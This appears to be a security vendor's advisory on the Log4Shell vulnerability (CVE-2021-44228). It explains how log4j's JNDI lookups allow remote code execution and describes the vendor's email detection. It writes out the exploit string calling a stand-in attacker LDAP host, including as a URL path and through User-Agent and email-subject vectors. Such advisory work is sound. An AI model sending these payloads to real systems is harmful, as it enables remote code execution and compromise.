Background

CVE-2021-44228, or also known as Log4Shell, is a vulnerability in the popular Java logging package log4j.


Log4j is used by many JAVA enterprise software to implement logging. The vulnerability is caused by a feature added in 2013 that added expansion of (local environment) variables in log messages. So e.g. `${env:FOOBAR}` in a log message would expand to the environment variable `FOOBAR`. It also allows expanding variables in the JNDI (Java Naming and Directory Interface) context. This is were the vulnerability manifests. If the string `${jndi:ldap://attacker-controlled.com/x}` is logged via log4j the system will request the attacher controlled URI via the JAVA Naming and Directory Interface (JNDI) and then download and execute any attacker controlled JAVA class file leading to a remote code execution vulnerability.

Attack procedure

The vulnerability is so dangerous because it is so simple to exploit. An attack must only make a victim write his exploit string `${jndi:ldap://attacker-controlled.com/x}` into a log file using log4j. log4j is virtually the default logging library for JAVA enterprise applications making them vulnerable to CVE-2021-44228. Most applications log specific action by default, e.g., a webserver will log web requests. An attacker would simple need to request the URL `http://vulnerable-webserver.com/${jndi:ldap://attacker-controlled.com/x}` or set their User-Agent string to the exploit in order to compromise a system.
The exploit string could travel via any path, as long as eventually it gets logged by a JAVA application using log4j, e.g., a JAVA-based email client could receive an email where the subject of the email is set to the Log4Shell exploit string. Once the JAVA-base email client writes to its logs via the log4j library that it has received a new email the exploit would trigger.

Statement Hornetsecurity

Hornetsecurity already detects the malicious exploit string in emails, but so far has not observed attackers using emails directly as attack vector. The cases that have been observed so far (besides security companies and customers testing for the vulnerability) come from web forms into which the attackers wrote the Log4Shell exploit, for which the owner of the web form then received a notification email containing the fields of the form, which then obviously contained the exploit string.
Hornetsecurity is monitoring emails for CVE-2021-44228 exploitation patterns and will constantly append detection to adapt to new obfuscations in preparation for potential targeted email campaigns using the Log4Shell exploit.

References